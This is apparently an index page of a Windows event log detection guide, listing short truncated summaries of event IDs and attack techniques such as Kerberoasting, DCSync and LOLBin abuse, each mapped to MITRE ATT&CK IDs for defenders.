EventPeeker

Windows Event Log Detection Guide

Security reference for analysts and threat hunters. Each guide covers what the event means, MITRE ATT&CK mapping, investigation steps, and remediation.

Event ID 4625 — Failed Logon

Event ID 4625 is logged every time a Windows account fails to authenticate. A single failure is normal, but large volume

T1110

Event ID 4794 — DSRM Account Password Change

Event ID 4794 is logged when the Directory Services Restore Mode (DSRM) administrator password on a domain controller is

T1098

Event ID 1102 — Security Audit Log Cleared

Event ID 1102 is logged when the Windows Security event log is cleared. While administrators sometimes clear logs for ma

T1070

Event ID 4698 — Scheduled Task Created

Event ID 4698 is logged when a new scheduled task is created on a Windows system. Scheduled tasks are a common persisten

T1053

Event ID 7045 — New Service Installed

Event ID 7045 is logged when a new Windows service is installed on a system. While legitimate software installs services

T1543

Event ID 4104 — PowerShell Script Block Logging

Event ID 4104 captures the full content of PowerShell scripts as they execute, including de-obfuscated code. When script

T1059.001

Event ID 4740 — Account Lockout

Event ID 4740 is logged when a Windows user account is locked out after exceeding the failed logon threshold. Account lo

T1110

Event ID 4672 — Special Privileges Assigned to New Logon

Event ID 4672 is logged whenever an account logs on with sensitive or special privileges such as SeDebugPrivilege, SeImp

T1078

Event ID 4720 — User Account Created

Event ID 4720 is logged when a new user account is created in Active Directory or on a local Windows system. While routi

T1136

Event ID 4728 / 4732 — User Added to Privileged Group

Event ID 4728 is logged when a user is added to a global security group (such as Domain Admins). Event ID 4732 covers lo

T1098

PowerShell Abuse — Living Off the Land

PowerShell is one of the most abused tools in modern attacks. Because it is built into every Windows system and trusted

T1059.001

PowerShell Encoded Command & Obfuscation Detection — AMSI Bypass, Downgrade Attacks

Attackers obfuscate PowerShell to evade signature-based detection — encoding commands in Base64, splitting strings to br

T1059.001

PowerShell Security — Attack Detection, Logging & Investigation Hub

PowerShell is the most abused execution tool in modern Windows attacks — used for payload delivery, credential dumping,

T1059.001

Failed Logon Spike — Brute Force and Password Spray

A failed logon spike is a large volume of authentication failures in a short window — the fingerprint of a brute-force o

T1110

Windows Authentication Attacks — Credential, Kerberos & NTLM Detection Hub

Authentication attacks are the most common initial access and lateral movement vector in Windows environments. This hub

T1110

Windows Defender Disabled or Tampered

Attackers routinely disable or tamper with Windows Defender before executing their main payload — disabling real-time pr

T1562.001

Microsoft Defender Alerts — Investigation & Response Guide

Windows Defender logs every detection, remediation action, and configuration change as Windows events. This hub covers h

T1562.001

Lateral Movement — Spreading Across the Network

Lateral movement is how attackers spread from their initial foothold to other systems on the network — reaching domain c

T1021

Ransomware Indicators — Pre-Encryption Activity

Ransomware attacks follow a predictable pattern in Windows event logs — disabling defenses, establishing persistence, sp

T1486

Privilege Escalation — Gaining Admin and Domain Access

Privilege escalation is the step between gaining an initial foothold and gaining full control. Attackers add accounts to

T1078

WMI Persistence — Event Subscription Backdoors

Windows Management Instrumentation (WMI) event subscriptions allow code to execute automatically in response to system e

T1546.003

Credential Dumping

Credential dumping is the extraction of account credentials — password hashes, plaintext passwords, or Kerberos tickets

T1003

LSASS Memory Credential Dumping — Detection Beyond Mimikatz

LSASS (Local Security Authority Subsystem Service) stores credential material for every active session — NTLM hashes, Ke

T1003.001

DCSync Attack Detection — Mimikatz Replication & AD Credential Dumping

A DCSync attack abuses Active Directory replication rights to impersonate a domain controller and pull password hashes f

T1003.006

DCShadow Attack Detection — Rogue Domain Controller & AD Replication Abuse

DCShadow registers a rogue Domain Controller from a compromised domain-joined machine, forces malicious changes into Act

T1207

Detect Mimikatz — LSASS Dumping, DCSync & Credential Theft Indicators

Mimikatz is the most widely used credential theft tool in post-exploitation. It can extract plaintext passwords and NTLM

T1003

Detect Pass-the-Hash — NTLM Lateral Movement & Suspicious Network Logons

Pass-the-Hash (PtH) is a lateral movement technique where an attacker uses a stolen NTLM password hash to authenticate a

T1550.002

Overpass-the-Hash — NTLM Hash to Kerberos TGT Conversion

Overpass-the-Hash (OPtH) — also called Pass-the-Key — converts a stolen NTLM password hash into a legitimate Kerberos Ti

T1550.002

Living-Off-the-Land Binary Abuse (LOLBins)

Living-off-the-land (LOLBin) attacks abuse legitimate Windows binaries — certutil, bitsadmin, regsvr32, mshta, and other

T1218

Rundll32 Abuse — LOLBin Code Execution, LSASS Dump & DLL Proxy Detection

Rundll32.exe is a signed, trusted Windows binary that executes exported functions from DLL files. Attackers abuse it to

T1218.011

Kerberos Attacks (Kerberoasting, AS-REP Roasting)

Kerberos attacks exploit the Windows authentication protocol to extract and crack service account credentials offline, o

T1558.003

Detect Golden Ticket Attacks — Forged Kerberos TGT & krbtgt Hash Abuse

A Golden Ticket is a forged Kerberos Ticket Granting Ticket (TGT) created using the krbtgt account's NTLM hash. Because

T1558.001

Detect Silver Ticket Attacks — Forged Kerberos Service Tickets

A Silver Ticket is a forged Kerberos service ticket (TGS) created using a service account's NTLM hash. Unlike a Golden T

T1558.002

Pass-the-Ticket — Stolen Kerberos Ticket Lateral Movement

Pass-the-Ticket (PtT) steals a valid Kerberos ticket from a user's LSASS memory and injects it into a different session,

T1550.003

AS-REP Roasting — Kerberos Pre-Authentication Disabled Account Attack

AS-REP Roasting exploits accounts with Kerberos pre-authentication disabled. Without pre-authentication, the Domain Cont

T1558.004

Skeleton Key Attack — In-Memory LSASS Patch for Universal DC Authentication

A Skeleton Key attack patches LSASS on a domain controller in memory, inserting a secondary 'skeleton' password that wor

T1556.001

Suspicious Process Creation — Abnormal Parent-Child Relationships

Event ID 4688 logs every process creation on Windows when process auditing is enabled. Attackers abuse this by launching

T1059

UAC Bypass Detection — Privilege Escalation Without a Prompt

UAC bypass techniques allow attackers to silently elevate a process from a standard or medium-integrity context to high

T1548.002

PsExec & Remote Execution — Lateral Movement via Admin Shares

PsExec is a Sysinternals tool that executes commands on remote systems over SMB using admin shares (ADMIN$, C$). It is w

T1021.002

Scheduled Task Abuse — Persistence and Lateral Execution

Windows Scheduled Tasks are a primary persistence mechanism abused by malware, ransomware, and post-exploitation framewo

T1053.005

Account Persistence — Backdoor Accounts and Unauthorized Group Changes

Attackers who gain domain admin privileges frequently create backdoor accounts or add existing accounts to privileged gr

T1136

Malicious Service Installation — Persistence via Windows Services

Windows services run continuously in the background, start automatically at boot, and often execute under SYSTEM or Loca

T1543.003

Registry Run Key Persistence — Autostart via HKCU/HKLM Run Keys

Registry Run keys are one of the oldest and most common Windows persistence mechanisms. Entries written to HKCU\Software

T1547.001

Detecting Cobalt Strike with Sysmon

Cobalt Strike is the most widely abused commercial red-team framework in real-world attacks. It operates via a 'beacon'

T1055

Detecting Mimikatz with Sysmon

Mimikatz is the most widely used credential extraction tool in Windows environments. It reads NTLM hashes, Kerberos tick

T1003.001

Detecting Ransomware with Sysmon

Ransomware leaves a distinctive Sysmon trail across three event types: Sysmon 11 (File Create) captures the mass file en

T1486

Detecting Lateral Movement with Sysmon

Lateral movement is how attackers expand from one compromised host to others in the environment. Sysmon exposes lateral

T1021
← Analyze your own log file